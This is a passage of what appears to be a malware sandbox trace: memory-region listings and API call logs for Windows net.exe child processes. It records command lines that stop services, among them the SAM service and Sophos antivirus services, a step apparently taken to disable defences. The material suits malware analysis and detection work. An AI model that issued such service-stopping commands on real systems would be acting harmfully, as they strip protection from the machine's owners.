"c:\\windows\\system32\\msvcrt.dll") Region: id = 9385 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9386 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9387 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9388 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9389 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9406 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 719 os_tid = 0x13dc [0108.538] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f910 | out: lpSystemTimeAsFileTime=0x24f910*(dwLowDateTime=0xf5d7ff10, dwHighDateTime=0x1d48689)) [0108.538] GetCurrentProcessId () returned 0xde0 [0108.538] GetCurrentThreadId () returned 0x13dc [0108.538] GetTickCount () returned 0x24dc1 [0108.538] QueryPerformanceCounter (in: lpPerformanceCount=0x24f918 | out: lpPerformanceCount=0x24f918*=1815545600000) returned 1 [0108.539] GetModuleHandleW (lpModuleName=0x0) returned 0xff5c0000 [0108.539] __set_app_type (_Type=0x1) [0108.539] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5d9c9c) returned 0x0 [0108.539] __getmainargs (in: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788, _DoWildCard=0, _StartInfo=0xff5e479c | out: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788) returned 0 [0108.540] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.540] GetConsoleOutputCP () returned 0x1b5 [0108.540] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff5ecec0 | out: lpCPInfo=0xff5ecec0) returned 1 [0108.540] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.542] sprintf_s (in: _DstBuf=0x24f8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0108.542] setlocale (category=0, locale=".437") returned="English_United States.437" [0108.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.543] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.543] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0108.543] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f650, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0108.543] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0108.543] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8a8 | out: Buffer=0x24f8a8*=0x43c0f0) returned 0x0 [0108.543] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8a8 | out: Buffer=0x24f8a8*=0x43c110) returned 0x0 [0108.543] _fileno (_File=0x7fefdba2a80) returned 0 [0108.543] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0108.544] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0108.544] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0108.544] _wcsicmp (_String1="config", _String2="stop") returned -16 [0108.544] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0108.544] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0108.544] _wcsicmp (_String1="file", _String2="stop") returned -13 [0108.544] _wcsicmp (_String1="files", _String2="stop") returned -13 [0108.544] _wcsicmp (_String1="group", _String2="stop") returned -12 [0108.544] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0108.544] _wcsicmp (_String1="help", _String2="stop") returned -11 [0108.544] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0108.544] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0108.544] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0108.544] _wcsicmp (_String1="session", _String2="stop") returned -15 [0108.544] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0108.544] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0108.544] _wcsicmp (_String1="share", _String2="stop") returned -12 [0108.544] _wcsicmp (_String1="start", _String2="stop") returned -14 [0108.544] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0108.544] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0108.544] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0108.544] _wcsicmp (_String1="accounts", _String2="ReportServer$SYSTEM_BGC") returned -17 [0108.544] _wcsicmp (_String1="computer", _String2="ReportServer$SYSTEM_BGC") returned -15 [0108.544] _wcsicmp (_String1="config", _String2="ReportServer$SYSTEM_BGC") returned -15 [0108.544] _wcsicmp (_String1="continue", _String2="ReportServer$SYSTEM_BGC") returned -15 [0108.544] _wcsicmp (_String1="cont", _String2="ReportServer$SYSTEM_BGC") returned -15 [0108.544] _wcsicmp (_String1="file", _String2="ReportServer$SYSTEM_BGC") returned -12 [0108.544] _wcsicmp (_String1="files", _String2="ReportServer$SYSTEM_BGC") returned -12 [0108.544] _wcsicmp (_String1="group", _String2="ReportServer$SYSTEM_BGC") returned -11 [0108.544] _wcsicmp (_String1="groups", _String2="ReportServer$SYSTEM_BGC") returned -11 [0108.544] _wcsicmp (_String1="help", _String2="ReportServer$SYSTEM_BGC") returned -10 [0108.544] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SYSTEM_BGC") returned -10 [0108.545] _wcsicmp (_String1="localgroup", _String2="ReportServer$SYSTEM_BGC") returned -6 [0108.545] _wcsicmp (_String1="pause", _String2="ReportServer$SYSTEM_BGC") returned -2 [0108.545] _wcsicmp (_String1="session", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="sessions", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="sess", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="share", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="start", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="stats", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="statistics", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="stop", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="time", _String2="ReportServer$SYSTEM_BGC") returned 2 [0108.545] _wcsicmp (_String1="user", _String2="ReportServer$SYSTEM_BGC") returned 3 [0108.545] _wcsicmp (_String1="users", _String2="ReportServer$SYSTEM_BGC") returned 3 [0108.545] _wcsicmp (_String1="msg", _String2="ReportServer$SYSTEM_BGC") returned -5 [0108.545] _wcsicmp (_String1="messenger", _String2="ReportServer$SYSTEM_BGC") returned -5 [0108.545] _wcsicmp (_String1="receiver", _String2="ReportServer$SYSTEM_BGC") returned -13 [0108.545] _wcsicmp (_String1="rcv", _String2="ReportServer$SYSTEM_BGC") returned -2 [0108.545] _wcsicmp (_String1="netpopup", _String2="ReportServer$SYSTEM_BGC") returned -4 [0108.545] _wcsicmp (_String1="redirector", _String2="ReportServer$SYSTEM_BGC") returned -12 [0108.545] _wcsicmp (_String1="redir", _String2="ReportServer$SYSTEM_BGC") returned -12 [0108.545] _wcsicmp (_String1="rdr", _String2="ReportServer$SYSTEM_BGC") returned -1 [0108.545] _wcsicmp (_String1="workstation", _String2="ReportServer$SYSTEM_BGC") returned 5 [0108.545] _wcsicmp (_String1="work", _String2="ReportServer$SYSTEM_BGC") returned 5 [0108.545] _wcsicmp (_String1="wksta", _String2="ReportServer$SYSTEM_BGC") returned 5 [0108.545] _wcsicmp (_String1="prdr", _String2="ReportServer$SYSTEM_BGC") returned -2 [0108.545] _wcsicmp (_String1="devrdr", _String2="ReportServer$SYSTEM_BGC") returned -14 [0108.545] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SYSTEM_BGC") returned -6 [0108.545] _wcsicmp (_String1="server", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="svr", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="srv", _String2="ReportServer$SYSTEM_BGC") returned 1 [0108.545] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SYSTEM_BGC") returned -6 [0108.545] _wcsicmp (_String1="alerter", _String2="ReportServer$SYSTEM_BGC") returned -17 [0108.545] _wcsicmp (_String1="netlogon", _String2="ReportServer$SYSTEM_BGC") returned -4 [0108.545] _wcsupr (in: _String="ReportServer$SYSTEM_BGC" | out: _String="REPORTSERVER$SYSTEM_BGC") returned="REPORTSERVER$SYSTEM_BGC" [0108.546] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x43ce20 [0108.585] GetServiceKeyNameW (in: hSCManager=0x43ce20, lpDisplayName="REPORTSERVER$SYSTEM_BGC", lpServiceName=0xff5e5750, lpcchBuffer=0x24f7c8 | out: lpServiceName="", lpcchBuffer=0x24f7c8) returned 0 [0108.586] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0108.586] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0108.586] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SYSTEM_BGC") returned -13 [0108.586] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0108.586] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0108.586] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0108.586] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -1 [0108.586] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0108.586] _wcsicmp (_String1="work", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0108.586] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0108.586] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0108.586] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -14 [0108.586] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0108.586] _wcsicmp (_String1="server", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0108.586] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0108.586] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0108.586] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0108.586] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SYSTEM_BGC") returned -17 [0108.586] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SYSTEM_BGC") returned -4 [0108.586] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x24f7d0 | out: bufptr=0x24f7d0) returned 0x889 [0108.587] wcscpy_s (in: _Destination=0xff5e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0108.587] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0108.587] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0108.589] GetFileType (hFile=0xb) returned 0x2 [0108.589] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0108.589] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x24f690*=0x1e) returned 1 [0108.589] GetFileType (hFile=0xb) returned 0x2 [0108.589] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0108.589] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x24f690*=0x2) returned 1 [0108.590] _ultow (in: _Dest=0x889, _Radix=2422528 | out: _Dest=0x889) returned="2185" [0108.590] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0108.590] GetFileType (hFile=0xb) returned 0x2 [0108.590] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0108.590] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0x24f690*=0x34) returned 1 [0108.591] GetFileType (hFile=0xb) returned 0x2 [0108.591] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0108.591] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0x24f690*=0x2) returned 1 [0108.591] NetApiBufferFree (Buffer=0x43c0f0) returned 0x0 [0108.591] NetApiBufferFree (Buffer=0x43c110) returned 0x0 [0108.591] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0108.591] exit (_Code=2) Process: id = "247" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x59222000" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9390 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9391 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9392 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9393 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 9394 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9395 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9396 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9397 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9398 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9399 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9400 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 9401 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9402 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 9403 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9404 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9422 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9423 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9424 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9425 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 9426 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 9427 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9428 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9429 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 9430 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 9431 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 9432 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9433 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9434 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9435 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9436 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9437 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9438 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9439 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9440 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9441 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 720 os_tid = 0xc24 Process: id = "248" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5fc42000" os_pid = "0x12b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SAVAdminService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9407 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9408 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9409 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9410 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9411 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9412 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9413 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9414 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9415 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9416 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9417 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9418 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9419 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 9420 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9421 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 722 os_tid = 0xf40 Process: id = "249" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x53d62000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SAVService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9442 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9443 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9444 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9445 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9446 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9447 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9448 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9449 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9450 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9451 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9452 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9453 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9454 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9455 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 